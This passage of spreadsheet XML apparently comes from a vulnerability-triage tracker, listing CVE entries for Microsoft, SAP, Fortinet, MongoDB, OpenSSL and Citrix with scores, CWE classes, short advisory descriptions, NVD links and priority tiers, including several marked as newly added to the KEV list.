        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73019</t>
        </is>
      </c>
      <c r="D423" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E423" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F423" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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3" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr">
        <is>
          <t>CWE-41</t>
        </is>
      </c>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76962</t>
        </is>
      </c>
      <c r="D424" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E424" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F424" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G424" s="5" t="inlineStr"/>
      <c r="H424" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I424" s="5" t="inlineStr"/>
      <c r="J424" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K424" s="5" t="inlineStr"/>
      <c r="L424" s="5" t="inlineStr"/>
      <c r="M424" s="5" t="inlineStr"/>
      <c r="N424" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76963</t>
        </is>
      </c>
      <c r="D425" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E425" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F425" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G425" s="5" t="inlineStr"/>
      <c r="H425" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I425" s="5" t="inlineStr"/>
      <c r="J425" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K425" s="5" t="inlineStr"/>
      <c r="L425" s="5" t="inlineStr"/>
      <c r="M425" s="5" t="inlineStr"/>
      <c r="N425" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76977</t>
        </is>
      </c>
      <c r="D426" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E426" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F426" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78455</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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27" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78516</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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8" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69904</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K429" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Microsoft Office SharePoint allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69904</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76960</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S430"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T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76960</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76961</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S431"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T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76961</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84389</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>A url redirection to untrusted site ('open redirect') vulnerability in Fortinet FortiSIEM 7.5.0 through 7.5.1, FortiSIEM 7.4.1 through 7.4.2 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84389</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84392</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84392</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82060</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K434" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L434" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="S434"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T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82060</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58234</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K435" s="5" t="inlineStr"/>
      <c r="L435" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58234</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86517</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K436" s="5" t="inlineStr"/>
      <c r="L436" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62815</t>
        </is>
      </c>
      <c r="D437" s="5" t="inlineStr"/>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K437" s="5" t="inlineStr"/>
      <c r="L437" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.Native.Quic.MsQuic.OpenSSL, NuGet:Microsoft.Native.Quic.MsQuic.Schannel</t>
        </is>
      </c>
      <c r="M437" s="5" t="inlineStr">
        <is>
          <t>2.4.19, 2.5.10</t>
        </is>
      </c>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr"/>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62815</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D438" s="5" t="inlineStr"/>
      <c r="E438" s="5" t="inlineStr"/>
      <c r="F438" s="5" t="inlineStr"/>
      <c r="G438" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H438" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I438" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K438" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr"/>
      <c r="P438" s="5" t="inlineStr"/>
      <c r="Q438" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R438" s="5" t="inlineStr"/>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D439" s="5" t="inlineStr"/>
      <c r="E439" s="5" t="inlineStr"/>
      <c r="F439" s="5" t="inlineStr"/>
      <c r="G439" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H439" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I439" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K439" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr"/>
      <c r="P439" s="5" t="inlineStr"/>
      <c r="Q439" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S439"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439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D440" s="5" t="inlineStr"/>
      <c r="E440" s="5" t="inlineStr"/>
      <c r="F440" s="5" t="inlineStr"/>
      <c r="G440" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H440" s="5" t="n">
        <v>0.758</v>
      </c>
